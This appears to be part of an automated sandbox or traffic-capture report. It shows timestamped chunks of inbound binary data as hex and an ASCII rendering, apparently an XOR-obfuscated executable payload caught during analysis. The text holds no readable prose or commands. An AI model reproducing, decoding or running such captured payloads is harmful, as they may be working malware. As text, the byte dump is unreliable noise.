                                2022-06-26 07:42:48 UTC71INData Raw: 65 29 64 20 21 0e e5 30 8d 38 61 65 25 89 da 55 89 64 45 60 b6 a3 f6 26 64 83 31 66 20 21 66 69 fd 29 64 20 1d 5e 58 1d 25 99 de da 30 1d 60 b6 5a c0 0e e5 7f 34 34 89 64 35 c6 39 c4 1b d6 da da 0d 7c da da da 0d 9d d8 da da 0d a2 d8 da da 3a 83 36 34 34 38 9e 30 66 11 5e e9 1d 2e 7b 32 9a 5d 0b 1c 25 66 22 2d 60 e5 99 79 66 55 0e b6 66 65 29 64 20 21 0e e5 30 8d a8 61 65 25 89 da 55 89 64 45 16 ce a3 3f 66 20 21 66 29 fd 64 20 1d 1e 64 3a 31 5e 58 1d 25 99 de da 30 1d 16 ce 5a 0b 0e e5 7f 34 34 89 64 35 c6 39 c4 ab d6 da da 0d 0c da da da 0d 2d d8 da da 0d 32 d8 da da 3a 83 36 34 34 38 9e 2c 7b 32 e3 5d 0b 1c 25 68 58 e9 94 e6 25 25 25 ce 80 6a e0 7d 0b 1c 25 6a e0 79 0b 1c 25 64 08 71 0b 1c 25 64 f8 75 0b 1c 25 7e 65 0b 1c 25 64 f0 6d 0b 1c 25 68 28 e9
                                Data Ascii: e)d !08ae%UdE`&d1f !fi)d ^X%0`Z44d59|:64480f^.{2]%f"-`yfUfe)d !0ae%UdE?f !f)d d:1^X%0Z44d59-2:6448,{2]%hX%%%j}%jy%dq%du%~e%dm%h(
                                2022-06-26 07:42:48 UTC72INData Raw: 0d 7c f5 da da 38 e7 29 25 b5 2e 7b 32 30 5c e9 29 15 da da 75 5e e9 21 66 cc 64 39 49 66 1d 60 1b 5a e4 66 a2 0d a9 23 da da c6 3a 68 93 dc 5c d8 da e2 25 25 58 4d 7b 68 69 49 2d 66 71 49 29 df da ea 25 25 0d a9 da da da 66 fd 60 b6 a1 ea 68 79 49 29 66 a2 66 a6 0d 1c da da da c6 51 66 b8 de b6 66 a2 66 ae 0d 57 29 25 25 7b 66 e2 66 71 49 29 66 ae 0d 79 da da da 66 fd 60 b6 58 27 0e b6 66 a2 66 ae 0d ee 29 25 25 5c e9 29 35 25 25 38 3a 83 36 9e 77 64 07 94 dc 25 25 25 0d d6 23 da da 7f 9e b5 0c a4 60 f7 99 fc 77 5f 2f 99 f2 5f 6f dc 99 ec 5f 6f 27 99 e6 5f 6f de 99 e0 5e e7 29 c6 0d 67 67 67 64 ac 7f 04 ac c4 f1 23 da da 9e 68 65 25 0c a4 60 f7 99 08 77 8b 16 2f 99 45 8b 16 6f 27 99 f2 8b 16 6f 29 99 33 8b 16 6f 2b 99 e0 5e e7 2d c6 09 5e e7 27 5e e7 27
                                Data Ascii: |8)%.{20\)u^!fd9If`Zf#:h\%%XM{hiI-fqI)%%f`hyI)ffQfffW)%%{ffqI)fyf`X'ff)%%\)5%%8:6wd%%%#`w_/_o_o'_o^)gggd#he%`w/Eo'o)3o+^-^'^'
                                2022-06-26 07:42:48 UTC73INData Raw: 25 25 25 75 0d a9 a6 da da 5e 9e 29 73 50 0d 83 36 9e 68 65 25 60 f7 ea a9 e1 da da da 66 6f 21 ac c4 ea a9 8c da da da 2c 77 75 0d 30 a6 da da 60 e5 ea a9 4c da da da 9e 2e 7b 32 30 5c e9 29 15 da da 75 5e e9 21 66 cc 64 39 49 66 1d 60 1b 5a e4 66 a2 0d a5 da da da c6 38 68 93 dc 5c d8 da e2 25 25 58 4d 7b 68 69 49 2d 66 71 49 29 df da e2 25 25 0d 41 1f da da 66 fd 60 b6 a3 ea 68 79 49 29 66 a2 66 a6 0d 14 25 25 25 c6 4f 66 b8 66 a2 66 ae 0d ad dc 25 25 7b 66 e2 66 71 49 29 66 ae 0d 13 d4 da da 66 fd 60 b6 58 27 0e b6 66 a2 66 ae 0d 44 dc 25 25 5c e9 29 35 25 25 38 3a 83 36 9e 66 e5 60 a4 ea a9 31 da da da 75 2c 77 0d cd ef da da 60 e5 ea a9 f1 23 da da 7f da 57 64 27 0d cb ef da da 9e b5 0c a4 60 f7 99 08 77 8b 16 2f 99 45 8b 16 6f 27 99 f2 8b 16 6f 29
                                Data Ascii: %%%u^)sP6he%`fo!,wu0`L.{20\)u^!fd9If`Zf8h\%%XM{hiI-fqI)%%Af`hyI)ff%%%Offf%%{ffqI)ff`X'ffD%%\)5%%8:6f`1u,w`#Wd'`w/Eo'o)
                                2022-06-26 07:42:48 UTC75INData Raw: da da da 2a 5a 0d 38 c6 57 30 64 b0 64 fd de 81 53 27 64 17 0d fa da da da 2a 5a 15 38 c6 41 66 de 5e 9e 29 0d 42 33 25 25 2a 5a ce c6 e8 66 de 5e 9e 29 0d 45 e2 25 25 2a 5a ce 3a 83 36 9e b5 5e 18 3d e5 1c 25 25 99 e2 da f0 3d e5 1c 25 9e d5 35 0d 60 03 da da 9e 2e 7b 32 30 64 9e 64 fb 0c e5 af 1c dc 68 a1 2d 2f 66 4a 21 0c e5 66 2a 1d 2c 66 2a 29 04 9c a3 e6 64 e7 dc 15 dc ff 0d 1d 03 da da 66 22 29 66 f2 66 37 af 2f a5 d4 2f 99 0c a5 d4 e6 99 18 a5 d4 31 99 24 a5 d4 e8 99 30 a5 d4 33 99 95 a5 d4 ea ea a9 a5 25 25 25 a5 d4 ec ea a9 ad 25 25 25 d5 27 38 3a 83 36 c4 f4 03 da da 66 39 55 dc fd 0d 5e ce da da dd 29 25 25 25 c6 58 66 39 55 dc fd 0d 03 d4 da da dd 29 25 25 25 c6 91 68 39 55 dc fd 0d 2c da da da dd 35 25 25 25 c6 36 0c a4 af 6f dc da 99 ec 27
                                Data Ascii: *Z8W0ddS'd*Z8Af^)B3%%*Zf^)E%%*Z:6^=%%=%5`.{20ddh-/fJ!f*,f*)df")ff7//1$03%%%%%%'8:6f9U^)%%%Xf9U)%%%h9U,5%%%6o'
                                2022-06-26 07:42:48 UTC76INData Raw: 66 3d 60 b6 5a f6 60 b6 58 e2 d5 29 0d 97 b4 da da 66 20 21 66 30 1d 0d 9a da da da c4 3e dc 25 25 0e da 5e 58 0d 25 99 e8 5e 48 0d 29 66 20 0d 66 5d 5e 48 0d 29 66 20 1d ea db 65 dc dc 20 1d 66 20 1d 66 95 27 66 75 2b 60 f7 99 e2 66 27 64 20 1d c6 e0 0e e5 64 20 1d 66 9e d2 13 64 20 11 66 20 11 74 d2 d6 16 15 99 e2 d5 29 0d 37 b4 da da 5e 20 11 2d 5e 58 0d 25 99 2d 66 20 0d 5e 5d dc 50 61 66 20 0d 64 20 09 16 d6 a3 fa 5e 58 1d 25 99 f4 66 20 0d 5e e5 2d 66 ae ea 8a fb de e7 66 aa 06 a6 66 30 1d 0d 02 da da da 68 20 09 66 30 11 0d ed b2 da da 66 20 09 64 20 0d c6 3e 66 20 0d da 2d 66 20 11 0d 3e b2 da da 64 20 0d 64 58 15 16 38 15 58 de 64 38 15 5e 58 1d 25 99 51 66 30 15 ea 8a fb 66 20 0d 5e e5 2d 0e a4 0d 65 01 da da 66 20 15 75 66 30 21 66 37 66 20 0d
                                Data Ascii: f=`Z`X)f !f0>%%^X%^H)f f]^H)f e f f'fu+`f'd d fd f t)7^ -^X%-f ^]Paf d ^X%f ^-fff0h f0f d >f -f >d dX8Xd8^X%Qf0f ^-ef uf0!f7f
                                2022-06-26 07:42:48 UTC78INData Raw: 0d e0 25 25 25 68 60 ba 23 da da df e0 dc 25 25 0d 5c d8 da da 68 20 0d 75 68 20 13 75 8f 25 8f 25 68 60 ba 23 da da 75 66 20 1d 75 0d 04 96 da da 60 e5 99 47 68 20 0d 75 68 20 13 75 8f 25 8f 25 8d f1 7d 65 25 66 20 1d 75 0d e6 96 da da 60 e5 99 29 eb 20 13 25 eb 20 17 25 0e e5 7f 34 34 89 64 35 8d 32 32 65 25 66 20 1d 75 0d b4 df da da 9e c4 0a 07 da da c6 ca 8d e0 dc 25 25 66 20 21 75 68 60 ba 23 da da 75 0d c9 df da da 8f e0 68 20 ce 75 8f de 0d 5a df da da 75 0d 2c df da da 0e b6 a5 98 ba 23 da da 25 ea a9 d4 25 25 25 a5 58 ce 25 50 2f a5 58 13 25 ea a9 c4 25 25 25 68 60 ba 23 da da 75 0d 93 df da da 68 70 ba 23 da da de e7 64 20 09 c6 de da 28 09 66 20 09 a5 5d 53 99 e6 68 60 ba 23 da da 16 20 09 50 0f 68 60 ba 23 da da 16 20 09 ea a9 86 25 25 25 da
                                Data Ascii: %%%h`#%%\h uh u%%h`#uf u`Gh uh u%%}e%f u`) % %44d522e%f u%%f !uh`#uh uZu,#%%%%X%P/X%%%%h`#uhp#d (f ]Sh`# Ph`# %%%
                                2022-06-26 07:42:48 UTC79INData Raw: 5e e9 15 2e 7b 64 28 19 64 30 1d 64 20 21 5e 58 19 25 50 2f 0e e5 64 20 15 c4 e4 dc 25 25 a2 20 15 da da da da 0e e5 0e 1b 5e 58 21 25 ea a9 84 25 25 25 c4 a7 25 25 25 66 30 19 0e a4 af 31 57 6b 1b 9c a5 99 91 16 50 2d ea 5e fd 25 25 25 5e bc 1a 1b 9c 45 99 53 66 30 19 af 39 57 6b 66 ff a5 be e5 a5 d6 a5 ea 60 96 25 25 25 16 50 2d ea 5e d7 25 25 25 a5 07 1a 5c 07 da 25 25 25 9c bc 2b e6 ac 66 ef 66 30 19 af 39 57 6b 66 ff a5 be e5 a5 d6 a5 ea 60 68 25 25 25 a5 07 1a 5c 07 da 25 25 25 9c bc 2b 8b e6 ac 66 28 21 8b 64 39 1c c6 e2 66 30 21 8b 64 31 67 65 16 50 2d 4e e4 16 20 1d ea a7 95 da da da 16 20 1d 97 29 66 20 1d 6d 66 30 21 8b a2 29 67 25 25 c6 22 16 50 2d 4e 67 66 30 19 af 39 57 6b 1b e7 a5 99 55 16 50 2d 4e 10 a5 07 1a 1b e7 45 99 39 66 30 19 af 39
                                Data Ascii: ^.{d(d0d !^X%P/d %% ^X!%%%%%%%f01WkP-^%%%^ESf09Wkf`%%%P-^%%%\%%%+ff09Wkf`h%%%\%%%+f(!d9f0!d1geP-N )f mf0!)g%%"P-Ngf09WkUP-NE9f09
                                2022-06-26 07:42:48 UTC80INData Raw: 7c c1 e5 1c 25 75 0d 68 da da da 7f 36 9e 66 e5 dd 31 25 25 25 60 e5 99 fa 0d 87 da da da 7e c1 e5 1c 25 0d bd da da da 7c c1 e5 1c 25 75 0d 38 da da da 7e 99 0b 1c 25 9e 68 65 25 2c dd 31 25 25 25 60 e5 99 4b 5e 18 c1 e5 1c 25 da 99 f8 7c c1 e5 1c 25 75 0d 5b da da da 64 29 49 5e 61 49 25 99 e4 66 29 49 75 0d 31 da da da 7f 9e 66 e5 dd 31 25 25 25 60 e5 99 f4 0d e3 da da da 5e 18 c1 e5 1c 25 da 99 e6 7c c1 e5 1c 25 75 0d 1b 23 da da 9e b5 af e8 89 0b 1c 25 7c c1 e5 1c 25 a9 a4 50 4b 89 66 f0 51 25 25 25 66 29 a7 9e 0d e8 da da da 7c c1 e5 1c 25 75 0d f7 23 da da 60 e5 99 dc 9e 7c 99 0b 1c 25 9e 75 0d 9c 23 da da 60 e5 99 b6 9e dd c5 e5 1c 25 0d 9b d2 da da 9e b5 df c5 e5 1c 25 5e 58 31 dc 50 4f 75 77 eb e0 89 0b 1c 25 dc 66 28 2d 64 e8 8d 0b 1c 25 64 6f
                                Data Ascii: |%uh6f1%%%`~%|%u8~%he%,1%%%`K^%|%u[d)I^aI%f)Iu1f1%%%`^%|%u#%|%PKfQ%%%f)|%u#`|%u#`%%^X1POuw%f(-d%do
                                2022-06-26 07:42:48 UTC82INData Raw: 1d 64 20 21 66 28 1d 1c 66 20 21 66 f0 25 35 65 25 0d 88 09 da da 66 20 19 0d ac b8 da da 0e e5 30 8d 9f 42 65 25 89 da 55 89 64 45 eb 20 ce 25 66 50 1d 6b 73 60 1b a1 55 6b 0e da 66 38 21 66 20 19 0d dd b8 da da 75 66 de 0d d5 b8 da da 75 0d 67 23 da da 60 e5 50 e4 66 20 2d 64 5d eb 20 ce dc 22 5e 9e 29 73 50 fb 0e e5 7f 34 34 89 64 35 8d 5c 42 65 25 68 20 19 0d 9c fd da da 66 20 21 66 28 1d 1c 66 f0 25 35 65 25 0d ce 07 da da 9e c4 e0 f7 da da c6 03 af 20 ce 66 58 09 66 50 0d 66 38 11 66 c0 38 e7 29 25 b5 0e f7 84 25 25 25 29 99 2b 5c ef 25 27 25 25 84 25 25 25 45 99 08 84 25 25 25 65 99 ec 84 25 25 25 a5 99 e0 5e ef 65 c6 1c 5e ef 45 c6 61 84 25 25 25 a5 99 2d 5c ef a5 25 25 25 c6 08 5e ef 35 66 e7 9e 84 25 25 25 65 99 ec 84 25 25 25 a5 99 e0 5e ef 29
                                Data Ascii: d !f(f !f%5e%f 0Be%UdE %fPks`Ukf8!f ufug#`Pf -d] "^)sP44d5\Be%h f !f(f%5e% fXfPf8f8)%%%%)+\%'%%%%%E%%%e%%%^e^Ea%%%-\%%%^5f%%%e%%%^)
                                2022-06-26 07:42:48 UTC83INData Raw: 35 8d 83 91 65 25 68 20 19 66 f0 41 8b 65 25 0d ef b8 da da 9e c4 4d a8 da da c6 0f 66 20 05 3a 83 36 66 c0 38 9e 30 66 11 0e e5 30 8d 68 91 65 25 89 da 55 89 64 45 da e0 a5 0b 1c 25 0e e5 7f 34 34 89 64 35 8d b9 91 65 25 9e c4 17 f1 da da c6 1d 38 9e 66 e5 5e 08 a5 0b 1c 25 dc 9e 8d 0b 1c 25 15 da 25 25 8d 0b 1c 25 cc da 25 25 8d 0b 1c 25 17 da 25 25 8d 0b 1c 25 ce da 25 25 8d 0b 1c 25 19 da 25 25 8d 0b 1c 25 d0 da 25 25 8d 0b 1c 25 1b da 25 25 8d 0b 1c 25 d2 da 25 25 8d 0b 1c 25 1d da 25 25 8d 0b 1c 25 d4 da 25 25 8d 0b 1c 25 1f da 25 25 8d 0b 1c 25 d6 da 25 25 8d 0b 1c 25 21 da 25 25 8d 0b 1c 25 d8 da 25 25 8d 0b 1c 25 23 da 25 25 8d 0b 1c 25 da da 25 25 8d 0b 1c 25 05 da 25 25 8d 0b 1c 25 bc da 25 25 8d 0b 1c 25 07 da 25 25 8d 0b 1c 25 be da 25 25 8d
                                Data Ascii: 5e%h fAe%Mf :6f80f0he%UdE%44d5e%8f^%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%!%%%%%%#%%%%%%%%%%%%%%%%%
                                2022-06-26 07:42:48 UTC84INData Raw: 25 25 25 25 25 f1 4c 65 25 35 25 25 25 4d 4c 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 37 20 20 9d 99 40 97 93 3c 91 20 9d 3e 40 95 99 44 4a 93 b5 51 97 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 51 97 65 25 35 25 25 25 4d 4c 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 e4 20 24 93 99 20 97 97 4a 97 66 e5 a9 97 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 a9 97 65 25 35 25 25 25 05 4c 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 2f 20 69 44 9b 67 54 7f 40 97 4a b5 01 97 65 25 25 25 25 25 25 25
                                Data Ascii: %%%%%Le%5%%%MLe%[e%[e%[e%[e%[e%YYe%uYe%Ye%7 @< >@DJQe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Qe%5%%%MLe%[e%[e%[e%[e%[e%YYe%uYe%Ye% $ Jfe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%e%5%%%Le%[e%[e%[e%[e%[e%YYe%uYe%Ye%/ iDgT@Je%%%%%%%
                                2022-06-26 07:42:48 UTC86INData Raw: d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 33 20 2e 99 3c 3e 46 2a 9b 40 97 8b 91 4a 52 b5 95 52 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 95 52 65 25 35 25 25 25 4d 4c 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 e4 20 1e 4a 93 99 97 4a 91 1e 66 e5 ed 52 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 ed 52 65 25 31 25 25 25 d5 4a 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 e8 20 7b 3c 97 44 3c 93 99 20 97 97 4a 97 66 e5 49 9d 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25
                                Data Ascii: [e%[e%[e%[e%[e%YYe%uYe%Ye%3 .<>F*@JRRe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Re%5%%%MLe%[e%[e%[e%[e%[e%YYe%uYe%Ye% JJfRe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Re%1%%%Je%[e%[e%[e%[e%[e%YYe%uYe%Ye% {<D< JfIe%%%%%%%%%%%%%%%%%%%%%%%%
                                2022-06-26 07:42:48 UTC87INData Raw: 32 2e 64 eb 64 b2 e4 e5 99 de 66 65 21 e4 f7 99 de 66 77 21 64 9c 14 ac 9b 27 64 ac 14 a4 ce cb 99 4f af 83 da a5 d6 3c 97 2d a5 d6 9f 52 de a5 c6 45 af 5a da a5 da 3c 97 2d a5 da 9f 52 de a5 ca 45 5d d6 99 fd ea db 9e ea db b2 04 f5 36 3a 83 9e b5 14 f5 99 f4 e4 e5 99 f2 e4 f7 99 39 66 6d 21 16 6f 21 50 31 0d 6e da da da 60 e5 50 de d5 dc 9e 0c e5 9e b5 2e 7b 66 17 66 fd 66 eb 0d f2 eb da da 75 66 eb 0d ea ed da da 75 66 9e 0d e2 eb da da 75 66 9e 0d da a2 da da 75 8f 25 8d 25 29 25 25 0d 87 0b da da 5e 0d 27 83 36 9e 2e 7b 66 17 66 fd 66 eb 0d ba a0 da da 75 66 eb 0d b2 a2 da da 75 66 9e 0d aa a0 da da 75 66 9e 0d a2 a2 da da 75 8f dc 8d 25 29 25 25 0d 4f 0b da da 5e 0d 27 83 36 9e 2e 7b 66 17 66 fd 66 fb 66 9e 0d 94 da da da 60 e5 ea b9 e5 83 36 9e b5
                                Data Ascii: 2.ddfe!fw!d'dO<-REZ<-RE]6:9fm!o!P1n`P.{fffufufufu%%)%%^'6.{fffufufufu%)%%O^'6.{ffff`6
                                2022-06-26 07:42:48 UTC88INData Raw: 9c 1c 25 75 66 29 90 6d 9c 1c 25 75 66 a2 0d 0a 9e da da 75 0d 94 bc da da 3a 83 36 9e b5 2e 66 fd 8f 25 8d a5 25 25 25 8f 27 8f 25 8f 25 8d 25 25 25 e5 66 9e 0d 2d 9e da da 75 0d b7 bc da da 36 9e 0d b2 da da da 9e 66 e5 2e 7b 32 2c 66 d4 66 17 66 fd 8f 25 68 69 49 29 75 32 7b 2e 0d a2 07 da da 60 e5 50 e2 a2 29 49 da da da da 66 29 49 7f 3a 83 36 9e 2e 7b 32 2c 66 d4 66 17 66 fd 8f 25 68 69 49 29 75 32 7b 2e 0d fe be da da 60 e5 50 e2 a2 29 49 da da da da 66 29 49 7f 3a 83 36 9e 30 66 11 5e e9 1d 2e 7b 66 17 66 fd 66 20 2d 64 20 1d 66 20 31 64 20 21 7b 68 20 21 75 66 20 1d 75 2e 0d 74 07 da da 64 20 1d 66 20 1d 66 30 21 83 36 34 34 38 e7 2d 25 75 0d ef 05 da da 9e b5 30 66 11 5c e9 d9 23 da da 2e 66 fd 68 60 d9 23 da da 75 66 9e 0d 6b e7 da da 75 0d 4d
                                Data Ascii: %uf)m%ufu:6.f%%%%'%%%%%f-u6f.{2,fff%hiI)u2{.`P)If)I:6.{2,fff%hiI)u2{.`P)If)I:60f^.{fff -d f 1d !{h !uf u.td f f0!6448-%u0f\#.fh`#ufkuM
                                2022-06-26 07:42:48 UTC90INData Raw: 0c e5 64 20 21 de 28 35 64 58 1d 0c e5 64 20 19 64 20 15 64 20 11 e4 f7 99 e8 14 f3 99 e4 d1 61 00 99 33 cf 6f 50 ce 64 1d 06 20 1d c4 fe de 25 25 14 f3 99 17 d1 61 00 99 c4 68 83 23 64 38 0d ad 20 c2 61 08 50 e0 14 f3 99 01 d1 0d a3 25 25 25 61 5f 50 2f 64 38 19 14 f3 99 a6 d1 c6 bc 64 38 05 96 da da da da 61 53 50 2f 14 f3 99 dd d1 0d 7f 25 25 25 64 38 01 64 50 fd 2c 77 0d 70 25 25 25 7f 66 38 05 04 a6 4e 27 0c b6 a5 58 c2 08 50 2f 04 ef 4e 29 dc ac 0c f7 ce c9 62 b4 04 ef 4e 29 dc ac 0c f7 d5 45 ce cf 62 b4 04 ef 4e 29 dc ac 0c f7 ce c9 5e 58 15 25 99 2f 77 68 20 15 0d 41 da da da 7f 34 66 50 fd c4 22 da da da 0c b6 61 4f 99 47 61 55 97 18 61 14 52 14 44 b6 2f 25 25 25 51 55 ea db e5 dc 9e 14 f3 99 de d1 c6 09 7d c4 55 da da da 66 20 19 16 20 2d 5a 37
                                Data Ascii: d !(5dXd d d a3oPd %%ah#d8 aP%%%a_P/d8d8aSP/%%%d8dP,wp%%%f8N'XP/N)bN)EbN)^X%/wh A4fP"aOGaUaRD/%%%QU}Uf -Z7
                                2022-06-26 07:42:48 UTC91INData Raw: 25 ad 20 17 a2 20 11 25 25 25 25 dd ee 25 25 25 a5 d4 25 50 f2 66 20 31 5e 1d 27 58 e0 dd 27 25 25 25 5e 1d 37 a3 e0 dd 37 25 25 25 64 20 31 75 dd ea 02 25 25 a5 58 35 27 97 de 66 20 2d 75 68 20 f9 0d 38 27 25 25 66 58 21 ea 92 20 f9 08 da 5a 25 25 5e 1d 27 4e 3f 64 9c 0d 95 25 25 25 68 d9 24 e5 b1 65 25 de 50 11 94 de 25 25 25 ce c9 c6 08 68 50 b2 ea db 38 35 a5 d6 dc 99 35 a5 d6 29 52 e4 ea 9a 20 f9 16 20 31 a3 27 8e 25 68 41 78 d1 b1 65 25 de 38 11 66 f6 de 38 11 da ae 64 1d 06 20 21 36 83 3a c4 cc dc 25 25 b4 b1 65 25 10 68 65 25 91 68 65 25 91 68 65 25 fb 68 65 25 24 73 6b 73 1c 73 d1 2d e5 50 de d5 55 73 9e a5 58 fb 25 99 de d5 08 cf 9e 0d cc da da da ea 9a 28 f9 0c f7 16 28 31 5a f8 5e d4 d8 a1 3d e4 a4 5a 3f d5 55 cf a5 63 25 99 5f af 20 d6 cf d2
                                Data Ascii: % %%%%%%%%Pf 1^'X'%%%^77%%%d 1u%%X5'f -uh 8'%%fX! Z%%^'N?d%%%h$e%P%%%hP855)R 1'%hAxe%8f8d !6:%%e%he%he%he%he%$skss-PUsX%((1Z^=Z?Uc%_
                                2022-06-26 07:42:48 UTC92INData Raw: da 36 a5 da 08 50 27 b4 05 a5 d6 25 99 29 ba 1a c6 27 b6 1a 76 ba 05 8b 84 e4 25 50 2b d5 dc c6 29 b8 fd 0c e5 76 b6 07 b4 48 1d 76 c6 7b d1 2d e5 99 29 61 45 99 d2 73 9e 0c e5 0c f7 d1 51 5f 29 2f 4e ea ff e8 a1 9c 1c 25 64 20 19 ff 20 19 67 c6 0f 73 9e 0c e5 0c f7 af 33 a5 d4 06 99 e0 a5 d4 08 50 dc 6b af 2b 51 5f 29 2f 4e 33 6b 46 f7 2f dc e7 5c 1f 19 dc 25 25 97 0f a5 d4 08 50 27 d2 ff 9e 36 83 3a 66 c0 38 9e 30 66 11 5e e9 e5 2e 66 fd 8f 25 8f ea 8f 25 68 30 2d 68 20 e5 0e a4 0d f5 d4 da da 66 ed 68 30 e5 66 9e 0d 31 8a da da 36 66 c0 38 e7 31 25 b5 30 66 11 5e e9 e5 2e 66 fd 8f 25 8f 25 8f 25 68 30 2d 68 20 e5 8c dc 0d c5 d4 da da 66 ed 68 30 e5 66 9e 0d 01 d3 da da 36 66 c0 38 e7 2d 25 b5 2e 7b 66 17 66 fd 66 9e 0d 72 d7 da da 66 fb 0e a4 0d 9b 23
                                Data Ascii: 6P'%)'v%P+)vHv{-)aEsQ_)/N%d gs3Pk+Q_)/N3kF/\%%P'6:f80f^.f%%h0-h fh0f16f81%0f^.f%%%h0-h fh0f6f8-%.{fffrf#
                                2022-06-26 07:42:48 UTC93INData Raw: 66 ff 60 b6 99 3f 66 30 2d 66 b7 21 23 da da 66 28 2d 68 b9 ec 25 da da da 66 a6 0d fb b9 da da 66 20 2d dc bd 21 23 da da 36 38 9e 66 e5 30 66 11 2e 66 fd 66 20 2d 75 66 9e 0d d2 86 da da 66 f5 66 9e 0d c7 da da da 34 36 38 9e 66 e5 30 66 11 5e e9 05 2e 7b 66 17 66 fd 66 20 2d 75 8f 29 64 50 05 eb 20 09 25 64 38 0d eb 20 11 25 68 20 05 75 8f dc 94 b1 9c 1c 25 68 20 15 df 35 25 25 25 0d d9 ca da da 66 f5 68 20 15 0d 7f da da da 34 83 36 66 c0 38 9e 68 65 25 30 66 11 2c 66 20 2d 5e e5 21 66 35 64 30 21 c6 27 da 25 66 35 af 37 66 28 2d 5f 2c d6 99 17 66 25 06 20 21 65 66 30 2d 64 67 19 34 38 9e 66 e5 30 66 11 66 20 2d a5 9d c8 25 50 4f 66 20 2d 66 65 2d da 95 31 da 95 2d 66 20 2d 68 6d 13 66 20 2d 68 75 15 66 20 2d 5e e5 17 0d 70 23 da da 66 20 2d eb 65 c8
                                Data Ascii: f`?f0-f!#f(-h%ff -!#68f0f.ff -ufff468f0f^.{fff -u)dP %d8 %h u%h 5%%%fh 46f8he%0f,f -^!f5d0!'%f57f(-_,f% !ef0-dg48f0ff -%POf -fe-1-f -hmf -huf -^p#f -e
                                2022-06-26 07:42:48 UTC95INData Raw: 25 0d ca 1f da da 34 c4 ed e0 25 25 30 0d 0a d6 da da 34 30 0d 7d d6 da da 34 66 20 2d 75 30 68 30 fd 66 20 19 0d 9a d6 da da 34 66 20 fd 0d c7 1f da da 34 c4 76 e0 25 25 30 0d 27 d6 da da 34 30 0d 06 d6 da da 34 66 20 2d 75 30 68 30 f9 66 20 19 0d 23 21 da da 34 66 20 f9 0d 50 1f da da 34 c4 93 e0 25 25 30 0d b0 1f da da 34 30 0d 23 1f da da 34 66 20 19 6d 5e 0d 27 97 29 99 3d c6 55 66 20 2d 75 ea 92 20 15 66 30 19 0d 89 1f da da 34 c4 18 e0 25 25 66 20 2d 75 ea 92 20 15 66 29 60 d1 0b 1c 25 0d 4f 1f da da 34 c4 fe e0 25 25 66 20 2d 75 ea 92 20 15 66 29 60 01 0b 1c 25 0d 35 1f da da 34 c4 e4 e0 25 25 30 0d 95 1f da da 34 66 20 19 6d 5e 0d 27 97 2f 99 00 6d 99 24 6d 99 48 c6 5a 30 0d ab 1f da da 34 66 20 2d 75 ea 92 20 13 66 30 19 0d d4 d4 da da 34 c4 f7
                                Data Ascii: %4%%040}4f -u0h0f 4f 4v%%0'404f -u0h0f #!4f P4%%040#4f m^')=Uf -u f04%%f -u f)`%O4%%f -u f)`%54%%04f m^'/m$mHZ04f -u f04
                                2022-06-26 07:42:48 UTC96INData Raw: 66 20 2d 75 dd c1 0b 1c 25 df dc 25 25 25 0d 00 d0 da da 34 c6 40 66 2b 64 20 01 c6 fa 66 2b af 25 00 da 25 25 25 ea 7e e0 3d 9c 1c 25 4e e6 66 2b 0d 6b f8 25 25 64 2b c6 27 da 2b 66 2b a5 5d 25 99 e4 66 2b af 25 5f 20 d6 50 ac 66 20 2d 75 66 3b 06 30 01 66 20 01 0d b6 19 da da 34 66 2b a5 5d 25 99 3b da 2b c6 37 66 20 2d 75 68 20 d6 df dc 25 25 25 0d e3 19 da da 34 66 2b a5 5d 25 ea 60 ff 1d da da 66 20 2d da ad 1d 23 da da 0e e5 7f 34 34 89 64 35 8d f0 c7 65 25 68 20 f9 df 27 25 25 25 0d 1a c3 da da 9e c4 4c 72 da da c6 c6 3a 83 36 66 c0 38 9e 1c 28 0a 75 28 25 25 25 1c 0a 75 25 1c 28 75 28 25 25 25 25 1c 1c 1c 1c 25 25 25 25 1c 1c 1c 25 45 25 25 25 30 66 11 5c e9 1d 23 da da 2e 7b 66 ff 66 15 0e e5 64 60 21 23 da da 0e e5 64 60 1d 23 da da 60 b6 99 e6
                                Data Ascii: f -u%%%%4@f+d f+%%%%~=%Nf+k%%d+'+f+]%f+%_ Pf -uf;0f 4f+]%;+7f -uh %%%4f+]%`f -#44d5e%h '%%%Lr:6f8(u(%%%u%(u(%%%%%%%%%E%%%0f\#.{ffd`!#d`#`
